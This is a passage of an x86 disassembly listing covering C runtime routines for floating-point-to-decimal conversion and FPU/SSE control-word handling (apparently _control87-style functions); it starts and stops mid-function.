		mov	[ebp+var_58], edx
		mov	edx, [ebp+var_64]
		add	edx, 8
		mov	[ebp+var_54], edx

loc_41313C:				; CODE XREF: sub_412E61+321j
		mov	edx, [ebp+var_58]
		mov	esi, [ebp+var_54]
		movzx	esi, word ptr [esi]
		movzx	edx, word ptr [edx]
		mov	edi, [edi-4]
		imul	edx, esi
		and	[ebp+var_70], 0
		lea	esi, [edi+edx]
		cmp	esi, edi
		jb	short loc_41315D
		cmp	esi, edx
		jnb	short loc_413164

loc_41315D:				; CODE XREF: sub_412E61+2F6j
		mov	[ebp+var_70], 1

loc_413164:				; CODE XREF: sub_412E61+2FAj
		cmp	[ebp+var_70], 0
		mov	edi, [ebp+var_44]
		mov	[edi-4], esi
		jz	short loc_413173
		inc	word ptr [edi]

loc_413173:				; CODE XREF: sub_412E61+30Dj
		add	[ebp+var_58], 2
		sub	[ebp+var_54], 2
		dec	[ebp+var_50]
		cmp	[ebp+var_50], 0
		jg	short loc_41313C

loc_413184:				; CODE XREF: sub_412E61+2C9j
		inc	edi
		inc	edi
		inc	[ebp+var_5C]
		dec	[ebp+var_40]
		cmp	[ebp+var_40], 0
		mov	[ebp+var_44], edi
		jg	short loc_41311D
		add	eax, 0C002h
		test	ax, ax
		jle	short loc_4131DA

loc_41319F:				; CODE XREF: sub_412E61+372j
		test	[ebp+var_8], 80000000h
		jnz	short loc_4131D5
		mov	edx, [ebp+var_10]
		mov	edi, [ebp+var_C]
		mov	esi, [ebp+var_C]
		shl	[ebp+var_10], 1
		shr	edx, 1Fh
		add	edi, edi
		or	edi, edx
		mov	edx, [ebp+var_8]
		shr	esi, 1Fh
		add	edx, edx
		or	edx, esi
		add	eax, 0FFFFh
		test	ax, ax
		mov	[ebp+var_C], edi
		mov	[ebp+var_8], edx
		jg	short loc_41319F

loc_4131D5:				; CODE XREF: sub_412E61+345j
		test	ax, ax
		jg	short loc_41322C

loc_4131DA:				; CODE XREF: sub_412E61+33Cj
		add	eax, 0FFFFh
		test	ax, ax
		jge	short loc_41322C
		mov	edx, eax
		neg	edx
		movzx	edx, dx
		mov	[ebp+var_44], edx
		add	eax, edx

loc_4131F0:				; CODE XREF: sub_412E61+3BEj
		test	byte ptr [ebp+var_10], 1
		jz	short loc_4131F9
		inc	[ebp+var_48]

loc_4131F9:				; CODE XREF: sub_412E61+393j
		mov	edx, [ebp+var_8]
		mov	edi, [ebp+var_C]
		mov	esi, [ebp+var_C]
		shr	[ebp+var_8], 1
		shl	edx, 1Fh
		shr	edi, 1
		or	edi, edx
		mov	edx, [ebp+var_10]
		shl	esi, 1Fh
		shr	edx, 1
		or	edx, esi
		dec	[ebp+var_44]
		mov	[ebp+var_C], edi
		mov	[ebp+var_10], edx
		jnz	short loc_4131F0
		cmp	[ebp+var_48], 0
		jz	short loc_41322C
		or	word ptr [ebp+var_10], 1

loc_41322C:				; CODE XREF: sub_412E61+377j
					; sub_412E61+381j ...
		cmp	word ptr [ebp+var_10], 8000h
		ja	short loc_413245
		mov	edx, [ebp+var_10]
		and	edx, 1FFFFh
		cmp	edx, 18000h
		jnz	short loc_413278

loc_413245:				; CODE XREF: sub_412E61+3D1j
		cmp	[ebp+var_10+2],	0FFFFFFFFh
		jnz	short loc_413275
		and	[ebp+var_10+2],	0
		cmp	[ebp+var_C+2], 0FFFFFFFFh
		jnz	short loc_413270
		and	[ebp+var_C+2], 0
		cmp	word ptr [ebp+var_8+2],	0FFFFh
		jnz	short loc_41326A
		mov	word ptr [ebp+var_8+2],	8000h
		inc	eax
		jmp	short loc_413278
; ---------------------------------------------------------------------------

loc_41326A:				; CODE XREF: sub_412E61+3FEj
		inc	word ptr [ebp+var_8+2]
		jmp	short loc_413278
; ---------------------------------------------------------------------------

loc_413270:				; CODE XREF: sub_412E61+3F2j
		inc	[ebp+var_C+2]
		jmp	short loc_413278
; ---------------------------------------------------------------------------

loc_413275:				; CODE XREF: sub_412E61+3E8j
		inc	[ebp+var_10+2]

loc_413278:				; CODE XREF: sub_412E61+3E2j
					; sub_412E61+407j ...
		cmp	ax, 7FFFh
		jnb	short loc_41329A
		mov	dx, word ptr [ebp+var_10+2]
		mov	word ptr [ebp+var_20], dx
		mov	edx, [ebp+var_C]
		mov	[ebp+var_20+2],	edx
		mov	edx, [ebp+var_8]
		or	eax, ecx
		mov	[ebp+var_1A], edx
		mov	word ptr [ebp+var_16], ax
		jmp	short loc_4132B6
; ---------------------------------------------------------------------------

loc_41329A:				; CODE XREF: sub_412E61+230j
					; sub_412E61+239j ...
		neg	cx
		sbb	ecx, ecx
		and	dword ptr [ebp-1Ch], 0
		and	ecx, 80000000h
		add	ecx, 7FFF8000h
		and	[ebp+var_20], 0
		mov	[ebp+var_1A+2],	ecx

loc_4132B6:				; CODE XREF: sub_412E61+1D6j
					; sub_412E61+25Aj ...
		test	ebx, ebx
		jnz	loc_413029
		xor	eax, eax

loc_4132C0:				; CODE XREF: sub_412E61+1ABj
					; sub_412E61+1C2j
		mov	ecx, [ebp+var_1A+2]
		shr	ecx, 10h
		cmp	cx, 3FFFh
		mov	ebx, 7FFFh
		jb	loc_413520
		mov	esi, [ebp+var_28+2]
		inc	[ebp+var_4C]
		movzx	edx, cx
		mov	ecx, esi
		xor	ecx, edx
		and	edx, ebx
		and	esi, ebx
		and	ecx, 8000h
		cmp	dx, bx
		lea	edi, [esi+edx]
		mov	[ebp+var_58], eax
		mov	[ebp+var_10], eax
		mov	[ebp+var_C], eax
		mov	[ebp+var_8], eax
		movzx	edi, di
		jnb	loc_413506
		cmp	si, bx
		jnb	loc_413506
		cmp	di, 0BFFDh
		ja	loc_413506
		cmp	di, 3FBFh
		ja	short loc_41332B

loc_413323:				; CODE XREF: sub_412E61+503j
		mov	[ebp+var_1A+2],	eax
		jmp	loc_41351A
; ---------------------------------------------------------------------------

loc_41332B:				; CODE XREF: sub_412E61+4C0j
		cmp	dx, ax
		jnz	short loc_41334D
		inc	edi
		test	[ebp+var_1A+2],	7FFFFFFFh
		jnz	short loc_41334D
		cmp	[ebp-1Ch], eax
		jnz	short loc_41334D
		cmp	[ebp+var_20], eax
		jnz	short loc_41334D
		mov	word ptr [ebp+var_16], ax
		jmp	loc_413520
; ---------------------------------------------------------------------------

loc_41334D:				; CODE XREF: sub_412E61+4CDj
					; sub_412E61+4D7j ...
		cmp	si, ax
		jnz	short loc_413366
		inc	edi
		test	[ebp+var_28], 7FFFFFFFh
		jnz	short loc_413366
		cmp	[ebp+var_2C], eax
		jnz	short loc_413366
		cmp	[ebp+var_30], eax
		jz	short loc_413323

loc_413366:				; CODE XREF: sub_412E61+4EFj
					; sub_412E61+4F9j ...
		and	[ebp+var_54], 0
		lea	eax, [ebp+var_C]
		mov	[ebp+var_40], 5

loc_413374:				; CODE XREF: sub_412E61+580j
		mov	edx, [ebp+var_54]
		mov	esi, [ebp+var_40]
		add	edx, edx
		test	esi, esi
		mov	[ebp+var_50], esi
		jle	short loc_4133D5
		lea	esi, [ebp+var_28]
		lea	edx, [ebp+edx+var_20]
		mov	[ebp+var_5C], esi
		mov	[ebp+var_48], edx

loc_413390:				; CODE XREF: sub_412E61+572j
		mov	edx, [ebp+var_5C]
		mov	esi, [ebp+var_48]
		movzx	esi, word ptr [esi]
		movzx	edx, word ptr [edx]
		and	[ebp+var_44], 0
		imul	edx, esi
		mov	esi, [eax-4]
		lea	ebx, [esi+edx]
		cmp	ebx, esi
		jb	short loc_4133B1
		cmp	ebx, edx
		jnb	short loc_4133B8

loc_4133B1:				; CODE XREF: sub_412E61+54Aj
		mov	[ebp+var_44], 1

loc_4133B8:				; CODE XREF: sub_412E61+54Ej
		cmp	[ebp+var_44], 0
		mov	[eax-4], ebx
		jz	short loc_4133C4
		inc	word ptr [eax]

loc_4133C4:				; CODE XREF: sub_412E61+55Ej
		add	[ebp+var_48], 2
		sub	[ebp+var_5C], 2
		dec	[ebp+var_50]
		cmp	[ebp+var_50], 0
		jg	short loc_413390

loc_4133D5:				; CODE XREF: sub_412E61+520j
		inc	eax
		inc	eax
		inc	[ebp+var_54]
		dec	[ebp+var_40]
		cmp	[ebp+var_40], 0
		jg	short loc_413374
		add	edi, 0C002h
		xor	eax, eax
		cmp	di, ax
		jle	short loc_41342C

loc_4133F0:				; CODE XREF: sub_412E61+5C4j
		test	[ebp+var_8], 80000000h
		jnz	short loc_413427
		mov	edx, [ebp+var_10]
		mov	ebx, [ebp+var_C]
		mov	esi, [ebp+var_C]
		shl	[ebp+var_10], 1
		shr	edx, 1Fh
		add	ebx, ebx
		or	ebx, edx
		mov	edx, [ebp+var_8]
		shr	esi, 1Fh
		add	edx, edx
		or	edx, esi
		add	edi, 0FFFFh
		cmp	di, ax
		mov	[ebp+var_C], ebx
		mov	[ebp+var_8], edx
		jg	short loc_4133F0

loc_413427:				; CODE XREF: sub_412E61+596j
		cmp	di, ax
		jg	short loc_41347B

loc_41342C:				; CODE XREF: sub_412E61+58Dj
		add	edi, 0FFFFh
		cmp	di, ax
		jge	short loc_41347B
		mov	eax, edi
		neg	eax
		movzx	eax, ax
		add	edi, eax

loc_413440:				; CODE XREF: sub_412E61+60Cj
		test	byte ptr [ebp+var_10], 1
		jz	short loc_413449
		inc	[ebp+var_58]

loc_413449:				; CODE XREF: sub_412E61+5E3j
		mov	edx, [ebp+var_8]
		mov	ebx, [ebp+var_C]
		mov	esi, [ebp+var_C]
		shr	[ebp+var_8], 1
		shl	edx, 1Fh
		shr	ebx, 1
		or	ebx, edx
		mov	edx, [ebp+var_10]
		shl	esi, 1Fh
		shr	edx, 1
		or	edx, esi
		dec	eax
		mov	[ebp+var_C], ebx
		mov	[ebp+var_10], edx
		jnz	short loc_413440
		xor	eax, eax
		cmp	[ebp+var_58], eax
		jz	short loc_41347B
		or	word ptr [ebp+var_10], 1

loc_41347B:				; CODE XREF: sub_412E61+5C9j
					; sub_412E61+5D4j ...
		cmp	word ptr [ebp+var_10], 8000h
		ja	short loc_413494
		mov	edx, [ebp+var_10]
		and	edx, 1FFFFh
		cmp	edx, 18000h
		jnz	short loc_4134C5

loc_413494:				; CODE XREF: sub_412E61+620j
		cmp	[ebp+var_10+2],	0FFFFFFFFh
		jnz	short loc_4134C2
		cmp	[ebp+var_C+2], 0FFFFFFFFh
		mov	[ebp+var_10+2],	eax
		jnz	short loc_4134BD
		cmp	word ptr [ebp+var_8+2],	0FFFFh
		mov	[ebp+var_C+2], eax
		jnz	short loc_4134B7
		mov	word ptr [ebp+var_8+2],	8000h
		inc	edi
		jmp	short loc_4134C5
; ---------------------------------------------------------------------------

loc_4134B7:				; CODE XREF: sub_412E61+64Bj
		inc	word ptr [ebp+var_8+2]
		jmp	short loc_4134C5
; ---------------------------------------------------------------------------

loc_4134BD:				; CODE XREF: sub_412E61+640j
		inc	[ebp+var_C+2]
		jmp	short loc_4134C5
; ---------------------------------------------------------------------------

loc_4134C2:				; CODE XREF: sub_412E61+637j
		inc	[ebp+var_10+2]

loc_4134C5:				; CODE XREF: sub_412E61+631j
					; sub_412E61+654j ...
		cmp	di, 7FFFh
		jb	short loc_4134EA
		neg	cx
		mov	[ebp-1Ch], eax
		mov	[ebp+var_20], eax
		sbb	ecx, ecx
		and	ecx, 80000000h
		add	ecx, 7FFF8000h
		mov	[ebp+var_1A+2],	ecx

loc_4134E6:				; CODE XREF: sub_412E61+6A3j
		xor	eax, eax
		jmp	short loc_413520
; ---------------------------------------------------------------------------

loc_4134EA:				; CODE XREF: sub_412E61+669j
		mov	ax, word ptr [ebp+var_10+2]
		mov	word ptr [ebp+var_20], ax
		mov	eax, [ebp+var_C]
		mov	[ebp+var_20+2],	eax
		mov	eax, [ebp+var_8]
		or	edi, ecx
		mov	[ebp+var_1A], eax
		mov	word ptr [ebp+var_16], di
		jmp	short loc_4134E6
; ---------------------------------------------------------------------------

loc_413506:				; CODE XREF: sub_412E61+4A1j
					; sub_412E61+4AAj ...
		neg	cx
		sbb	ecx, ecx
		and	ecx, 80000000h
		add	ecx, 7FFF8000h
		mov	[ebp+var_1A+2],	ecx

loc_41351A:				; CODE XREF: sub_412E61+4C5j
		mov	[ebp-1Ch], eax
		mov	[ebp+var_20], eax

loc_413520:				; CODE XREF: sub_412E61+46Fj
					; sub_412E61+4E7j ...
		test	[ebp+arg_10], 1
		mov	edx, [ebp+var_60]
		mov	ecx, [ebp+var_4C]
		mov	[edx], cx
		jz	short loc_413561
		movsx	ecx, cx
		add	[ebp+arg_C], ecx
		cmp	[ebp+arg_C], eax
		jg	short loc_413561
		and	word ptr [edx],	0
		cmp	word ptr [ebp+var_6C], 8000h
		mov	byte ptr [edx+3], 1
		setnz	al
		dec	al
		and	al, 0Dh
		add	al, 20h
		mov	[edx+2], al
		mov	byte ptr [edx+4], 30h
		mov	byte ptr [edx+5], 0
		jmp	loc_412F10
; ---------------------------------------------------------------------------

loc_413561:				; CODE XREF: sub_412E61+6CCj
					; sub_412E61+6D7j
		push	15h
		pop	ecx
		cmp	[ebp+arg_C], ecx
		jle	short loc_41356C
		mov	[ebp+arg_C], ecx

loc_41356C:				; CODE XREF: sub_412E61+706j
		mov	esi, [ebp+var_1A+2]
		shr	esi, 10h
		push	8
		sub	esi, 3FFEh
		mov	word ptr [ebp+var_16], ax
		pop	ebx

loc_41357F:				; CODE XREF: sub_412E61+742j
		mov	eax, [ebp+var_20]
		mov	edi, [ebp-1Ch]
		mov	ecx, [ebp-1Ch]
		shl	[ebp+var_20], 1
		shr	eax, 1Fh
		add	edi, edi
		or	edi, eax
		mov	eax, [ebp+var_1A+2]
		shr	ecx, 1Fh
		add	eax, eax
		or	eax, ecx
		dec	ebx
		mov	[ebp-1Ch], edi
		mov	[ebp+var_1A+2],	eax
		jnz	short loc_41357F
		test	esi, esi
		jge	short loc_4135DB
		neg	esi
		and	esi, 0FFh
		jle	short loc_4135DB

loc_4135B3:				; CODE XREF: sub_412E61+778j
		mov	eax, [ebp+var_1A+2]
		mov	edi, [ebp-1Ch]
		mov	ecx, [ebp-1Ch]
		shr	[ebp+var_1A+2],	1
		shl	eax, 1Fh
		shr	edi, 1
		or	edi, eax
		mov	eax, [ebp+var_20]
		shl	ecx, 1Fh
		shr	eax, 1
		or	eax, ecx
		dec	esi
		test	esi, esi
		mov	[ebp-1Ch], edi
		mov	[ebp+var_20], eax
		jg	short loc_4135B3

loc_4135DB:				; CODE XREF: sub_412E61+746j
					; sub_412E61+750j
		mov	eax, [ebp+arg_C]
		inc	eax
		test	eax, eax
		lea	ebx, [edx+4]
		mov	[ebp+var_40], ebx
		mov	[ebp+var_4C], eax
		jle	loc_4136A5

loc_4135F0:				; CODE XREF: sub_412E61+83Ej
		mov	edx, [ebp+var_20]
		mov	eax, [ebp-1Ch]
		lea	esi, [ebp+var_20]
		lea	edi, [ebp+var_3C]
		movsd
		movsd
		movsd
		shl	[ebp+var_20], 1
		mov	edi, [ebp+var_20]
		shl	[ebp+var_20], 1
		shr	edx, 1Fh
		lea	ecx, [eax+eax]
		or	ecx, edx
		mov	edx, [ebp+var_1A+2]
		mov	esi, eax
		shr	esi, 1Fh
		add	edx, edx
		or	edx, esi
		mov	eax, ecx
		lea	esi, [ecx+ecx]
		shr	eax, 1Fh
		lea	ecx, [edx+edx]
		mov	edx, [ebp+var_3C]
		shr	edi, 1Fh
		or	ecx, eax
		mov	eax, [ebp+var_20]
		or	esi, edi
		lea	edi, [edx+eax]
		cmp	edi, eax
		jb	short loc_41363F
		cmp	edi, edx
		jnb	short loc_413657

loc_41363F:				; CODE XREF: sub_412E61+7D8j
		lea	eax, [esi+1]
		xor	edx, edx
		cmp	eax, esi
		jb	short loc_41364D
		cmp	eax, 1
		jnb	short loc_413650

loc_41364D:				; CODE XREF: sub_412E61+7E5j
		xor	edx, edx
		inc	edx

loc_413650:				; CODE XREF: sub_412E61+7EAj
		test	edx, edx
		mov	esi, eax
		jz	short loc_413657
		inc	ecx

loc_413657:				; CODE XREF: sub_412E61+7DCj
					; sub_412E61+7F3j
		mov	eax, [ebp+var_38]
		lea	edx, [eax+esi]
		cmp	edx, esi
		mov	[ebp+var_44], edx
		jb	short loc_413668
		cmp	edx, eax
		jnb	short loc_413669

loc_413668:				; CODE XREF: sub_412E61+801j
		inc	ecx

loc_413669:				; CODE XREF: sub_412E61+805j
		add	ecx, [ebp+var_34]
		shr	edx, 1Fh
		add	ecx, ecx
		or	ecx, edx
		lea	esi, [edi+edi]
		mov	[ebp+var_20], esi
		mov	esi, [ebp+var_44]
		mov	[ebp+var_1A+2],	ecx
		shr	ecx, 18h
		add	esi, esi
		add	cl, 30h
		mov	eax, edi
		shr	eax, 1Fh
		or	esi, eax
		mov	[ebx], cl
		inc	ebx
		dec	[ebp+var_4C]
		cmp	[ebp+var_4C], 0
		mov	[ebp-1Ch], esi
		mov	byte ptr [ebp+var_16+1], 0
		jg	loc_4135F0

loc_4136A5:				; CODE XREF: sub_412E61+789j
		dec	ebx
		mov	al, [ebx]
		dec	ebx
		cmp	al, 35h
		jge	short loc_4136BB
		mov	ecx, [ebp+var_40]
		jmp	short loc_4136F6
; ---------------------------------------------------------------------------

loc_4136B2:				; CODE XREF: sub_412E61+85Dj
		cmp	byte ptr [ebx],	39h
		jnz	short loc_4136C0
		mov	byte ptr [ebx],	30h
		dec	ebx

loc_4136BB:				; CODE XREF: sub_412E61+84Aj
		cmp	ebx, [ebp+var_40]
		jnb	short loc_4136B2

loc_4136C0:				; CODE XREF: sub_412E61+854j
		cmp	ebx, [ebp+var_40]
		mov	eax, [ebp+var_60]
		jnb	short loc_4136CC
		inc	ebx
		inc	word ptr [eax]

loc_4136CC:				; CODE XREF: sub_412E61+865j
		inc	byte ptr [ebx]

loc_4136CE:				; CODE XREF: sub_412E61+89Ej
		sub	bl, al
		sub	bl, 3
		movsx	ecx, bl
		mov	[eax+3], bl
		mov	byte ptr [ecx+eax+4], 0
		mov	eax, [ebp+var_74]

loc_4136E1:				; CODE XREF: sub_412E61+B2j
					; sub_412E61+15Bj
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
; ---------------------------------------------------------------------------

loc_4136F0:				; CODE XREF: sub_412E61+897j
		cmp	byte ptr [ebx],	30h
		jnz	short loc_4136FA
		dec	ebx

loc_4136F6:				; CODE XREF: sub_412E61+84Fj
		cmp	ebx, ecx
		jnb	short loc_4136F0

loc_4136FA:				; CODE XREF: sub_412E61+892j
		cmp	ebx, ecx
		mov	eax, [ebp+var_60]
		jnb	short loc_4136CE
		and	word ptr [eax],	0
		cmp	word ptr [ebp+var_6C], 8000h
		mov	byte ptr [eax+3], 1
		setnz	dl
		dec	dl
		and	dl, 0Dh
		add	dl, 20h
		mov	[eax+2], dl
		mov	byte ptr [ecx],	30h
		mov	byte ptr [eax+5], 0
		jmp	loc_412F10
sub_412E61	endp


; =============== S U B	R O U T	I N E =======================================



sub_413729	proc near		; CODE XREF: sub_413857+C0p
		xor	eax, eax
		test	bl, 10h
		jz	short loc_413731
		inc	eax

loc_413731:				; CODE XREF: sub_413729+5j
		test	bl, 8
		jz	short loc_413739
		or	eax, 4

loc_413739:				; CODE XREF: sub_413729+Bj
		test	bl, 4
		jz	short loc_413741
		or	eax, 8

loc_413741:				; CODE XREF: sub_413729+13j
		test	bl, 2
		jz	short loc_413749
		or	eax, 10h

loc_413749:				; CODE XREF: sub_413729+1Bj
		test	bl, 1
		jz	short loc_413751
		or	eax, 20h

loc_413751:				; CODE XREF: sub_413729+23j
		test	ebx, 80000h
		jz	short loc_41375C
		or	eax, 2

loc_41375C:				; CODE XREF: sub_413729+2Ej
		mov	ecx, ebx
		mov	edx, 300h
		and	ecx, edx
		push	esi
		mov	esi, 200h
		jz	short loc_413790
		cmp	ecx, 100h
		jz	short loc_41378B
		cmp	ecx, esi
		jz	short loc_413784
		cmp	ecx, edx
		jnz	short loc_413790
		or	eax, 0C00h
		jmp	short loc_413790
; ---------------------------------------------------------------------------

loc_413784:				; CODE XREF: sub_413729+4Ej
		or	eax, 800h
		jmp	short loc_413790
; ---------------------------------------------------------------------------

loc_41378B:				; CODE XREF: sub_413729+4Aj
		or	eax, 400h

loc_413790:				; CODE XREF: sub_413729+42j
					; sub_413729+52j ...
		mov	ecx, ebx
		and	ecx, 30000h
		jz	short loc_4137A6
		cmp	ecx, 10000h
		jnz	short loc_4137A8
		or	eax, esi
		jmp	short loc_4137A8
; ---------------------------------------------------------------------------

loc_4137A6:				; CODE XREF: sub_413729+6Fj
		or	eax, edx

loc_4137A8:				; CODE XREF: sub_413729+77j
					; sub_413729+7Bj
		test	ebx, 40000h
		pop	esi
		jz	short locret_4137B6
		or	eax, 1000h

locret_4137B6:				; CODE XREF: sub_413729+86j
		retn
sub_413729	endp


; =============== S U B	R O U T	I N E =======================================



sub_4137B7	proc near		; CODE XREF: sub_413857:loc_413A90p
		xor	eax, eax
		test	dl, 10h
		jz	short loc_4137C3
		mov	eax, 80h

loc_4137C3:				; CODE XREF: sub_4137B7+5j
		test	dl, 8
		push	ebx
		push	esi
		push	edi
		mov	ebx, 200h
		jz	short loc_4137D2
		or	eax, ebx

loc_4137D2:				; CODE XREF: sub_4137B7+17j
		test	dl, 4
		jz	short loc_4137DC
		or	eax, 400h

loc_4137DC:				; CODE XREF: sub_4137B7+1Ej
		test	dl, 2
		jz	short loc_4137E6
		or	eax, 800h

loc_4137E6:				; CODE XREF: sub_4137B7+28j
		test	dl, 1
		jz	short loc_4137F0
		or	eax, 1000h

loc_4137F0:				; CODE XREF: sub_4137B7+32j
		test	edx, 80000h
		mov	edi, 100h
		jz	short loc_4137FF
		or	eax, edi

loc_4137FF:				; CODE XREF: sub_4137B7+44j
		mov	ecx, edx
		mov	esi, 300h
		and	ecx, esi
		jz	short loc_413829
		cmp	ecx, edi
		jz	short loc_413824
		cmp	ecx, ebx
		jz	short loc_41381D
		cmp	ecx, esi
		jnz	short loc_413829
		or	eax, 6000h
		jmp	short loc_413829
; ---------------------------------------------------------------------------

loc_41381D:				; CODE XREF: sub_4137B7+59j
		or	eax, 4000h
		jmp	short loc_413829
; ---------------------------------------------------------------------------

loc_413824:				; CODE XREF: sub_4137B7+55j
		or	eax, 2000h

loc_413829:				; CODE XREF: sub_4137B7+51j
					; sub_4137B7+5Dj ...
		mov	ecx, 3000000h
		pop	edi
		and	edx, ecx
		cmp	edx, 1000000h
		pop	esi
		pop	ebx
		jz	short loc_413851
		cmp	edx, 2000000h
		jz	short loc_41384D
		cmp	edx, ecx
		jnz	short locret_413856
		or	eax, 8000h
		retn
; ---------------------------------------------------------------------------

loc_41384D:				; CODE XREF: sub_4137B7+8Aj
		or	eax, 40h
		retn
; ---------------------------------------------------------------------------

loc_413851:				; CODE XREF: sub_4137B7+82j
		or	eax, 8040h

locret_413856:				; CODE XREF: sub_4137B7+8Ej
		retn
sub_4137B7	endp


; =============== S U B	R O U T	I N E =======================================



sub_413857	proc near		; CODE XREF: sub_411CAF+25p
					; sub_411CAF+55p ...

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		sub	esp, 10h
		push	ebx
		push	ebp
		push	esi
		push	edi
		fstcw	word ptr [esp+20h+var_C]
		mov	ebx, [esp+20h+var_C]
		xor	edx, edx
		test	bl, 1
		jz	short loc_413871
		push	10h
		pop	edx

loc_413871:				; CODE XREF: sub_413857+15j
		test	bl, 4
		jz	short loc_413879
		or	edx, 8

loc_413879:				; CODE XREF: sub_413857+1Dj
		test	bl, 8
		jz	short loc_413881
		or	edx, 4

loc_413881:				; CODE XREF: sub_413857+25j
		test	bl, 10h
		jz	short loc_413889
		or	edx, 2

loc_413889:				; CODE XREF: sub_413857+2Dj
		test	bl, 20h
		jz	short loc_413891
		or	edx, 1

loc_413891:				; CODE XREF: sub_413857+35j
		test	bl, 2
		jz	short loc_41389C
		or	edx, 80000h

loc_41389C:				; CODE XREF: sub_413857+3Dj
		movzx	ecx, bx
		mov	eax, ecx
		mov	edi, 0C00h
		and	eax, edi
		mov	ebp, 300h
		mov	esi, 200h
		jz	short loc_4138D4
		cmp	eax, 400h
		jz	short loc_4138CE
		cmp	eax, 800h
		jz	short loc_4138CA
		cmp	eax, edi
		jnz	short loc_4138D4
		or	edx, ebp
		jmp	short loc_4138D4
; ---------------------------------------------------------------------------

loc_4138CA:				; CODE XREF: sub_413857+69j
		or	edx, esi
		jmp	short loc_4138D4
; ---------------------------------------------------------------------------

loc_4138CE:				; CODE XREF: sub_413857+62j
		or	edx, 100h

loc_4138D4:				; CODE XREF: sub_413857+5Bj
					; sub_413857+6Dj ...
		and	ecx, ebp
		jz	short loc_4138E4
		cmp	ecx, esi
		jnz	short loc_4138EA
		or	edx, 10000h
		jmp	short loc_4138EA
; ---------------------------------------------------------------------------

loc_4138E4:				; CODE XREF: sub_413857+7Fj
		or	edx, 20000h

loc_4138EA:				; CODE XREF: sub_413857+83j
					; sub_413857+8Bj
		test	bx, 1000h
		jz	short loc_4138F7
		or	edx, 40000h

loc_4138F7:				; CODE XREF: sub_413857+98j
		mov	esi, [esp+20h+arg_4]
		mov	ecx, [esp+20h+arg_0]
		mov	eax, esi
		not	eax
		and	eax, edx
		and	ecx, esi
		or	eax, ecx
		cmp	eax, edx
		mov	[esp+20h+var_4], eax
		jz	loc_4139BF
		mov	ebx, eax
		call	sub_413729
		movzx	eax, ax
		mov	[esp+20h+var_10], eax
		fldcw	word ptr [esp+20h+var_10]
		fstcw	word ptr [esp+20h+var_10]
		mov	ebx, [esp+20h+var_10]
		xor	edx, edx
		test	bl, 1
		jz	short loc_41393A
		push	10h
		pop	edx

loc_41393A:				; CODE XREF: sub_413857+DEj
		test	bl, 4
		jz	short loc_413942
		or	edx, 8

loc_413942:				; CODE XREF: sub_413857+E6j
		test	bl, 8
		jz	short loc_41394A
		or	edx, 4

loc_41394A:				; CODE XREF: sub_413857+EEj
		test	bl, 10h
		jz	short loc_413952
		or	edx, 2

loc_413952:				; CODE XREF: sub_413857+F6j
		test	bl, 20h
		jz	short loc_41395A
		or	edx, 1

loc_41395A:				; CODE XREF: sub_413857+FEj
		test	bl, 2
		jz	short loc_413965
		or	edx, 80000h

loc_413965:				; CODE XREF: sub_413857+106j
		movzx	ecx, bx
		mov	eax, ecx
		and	eax, edi
		jz	short loc_413992
		cmp	eax, 400h
		jz	short loc_41398C
		cmp	eax, 800h
		jz	short loc_413984
		cmp	eax, edi
		jnz	short loc_413992
		or	edx, ebp
		jmp	short loc_413992
; ---------------------------------------------------------------------------

loc_413984:				; CODE XREF: sub_413857+123j
		or	edx, 200h
		jmp	short loc_413992
; ---------------------------------------------------------------------------

loc_41398C:				; CODE XREF: sub_413857+11Cj
		or	edx, 100h

loc_413992:				; CODE XREF: sub_413857+115j
					; sub_413857+127j ...
		and	ecx, ebp
		jz	short loc_4139A6
		cmp	ecx, 200h
		jnz	short loc_4139AC
		or	edx, 10000h
		jmp	short loc_4139AC
; ---------------------------------------------------------------------------

loc_4139A6:				; CODE XREF: sub_413857+13Dj
		or	edx, 20000h

loc_4139AC:				; CODE XREF: sub_413857+145j
					; sub_413857+14Dj
		test	bx, 1000h
		jz	short loc_4139B9
		or	edx, 40000h

loc_4139B9:				; CODE XREF: sub_413857+15Aj
		mov	eax, edx
		mov	[esp+20h+var_4], edx

loc_4139BF:				; CODE XREF: sub_413857+B8j
		cmp	dword_4352E0, 0
		jz	loc_413B52
		and	esi, 308031Fh
		mov	edi, esi
		stmxcsr	[esp+20h+var_8]
		mov	eax, [esp+20h+var_8]
		xor	esi, esi
		test	al, al
		jns	short loc_4139E6
		push	10h
		pop	esi

loc_4139E6:				; CODE XREF: sub_413857+18Aj
		test	ax, 200h
		jz	short loc_4139EF
		or	esi, 8

loc_4139EF:				; CODE XREF: sub_413857+193j
		test	ax, 400h
		jz	short loc_4139F8
		or	esi, 4

loc_4139F8:				; CODE XREF: sub_413857+19Cj
		test	ax, 800h
		jz	short loc_413A01
		or	esi, 2

loc_413A01:				; CODE XREF: sub_413857+1A5j
		test	ax, 1000h
		jz	short loc_413A0A
		or	esi, 1

loc_413A0A:				; CODE XREF: sub_413857+1AEj
		test	ax, 100h
		jz	short loc_413A16
		or	esi, 80000h

loc_413A16:				; CODE XREF: sub_413857+1B7j
		mov	ecx, eax
		mov	ebp, 6000h
		and	ecx, ebp
		jz	short loc_413A4B
		cmp	ecx, 2000h
		jz	short loc_413A45
		cmp	ecx, 4000h
		jz	short loc_413A3D
		cmp	ecx, ebp
		jnz	short loc_413A4B
		or	esi, 300h
		jmp	short loc_413A4B
; ---------------------------------------------------------------------------

loc_413A3D:				; CODE XREF: sub_413857+1D8j
		or	esi, 200h
		jmp	short loc_413A4B
; ---------------------------------------------------------------------------

loc_413A45:				; CODE XREF: sub_413857+1D0j
		or	esi, 100h

loc_413A4B:				; CODE XREF: sub_413857+1C8j
					; sub_413857+1DCj ...
		mov	ebx, 8040h
		and	eax, ebx
		sub	eax, 40h
		jz	short loc_413A73
		sub	eax, 7FC0h
		jz	short loc_413A6B
		sub	eax, 40h
		jnz	short loc_413A79
		or	esi, 1000000h
		jmp	short loc_413A79
; ---------------------------------------------------------------------------

loc_413A6B:				; CODE XREF: sub_413857+205j
		or	esi, 3000000h
		jmp	short loc_413A79
; ---------------------------------------------------------------------------

loc_413A73:				; CODE XREF: sub_413857+1FEj
		or	esi, 2000000h

loc_413A79:				; CODE XREF: sub_413857+20Aj
					; sub_413857+212j ...
		mov	edx, edi
		and	edi, [esp+20h+arg_0]
		not	edx
		and	edx, esi
		or	edx, edi
		cmp	edx, esi
		jnz	short loc_413A90
		mov	eax, esi
		jmp	loc_413B3B
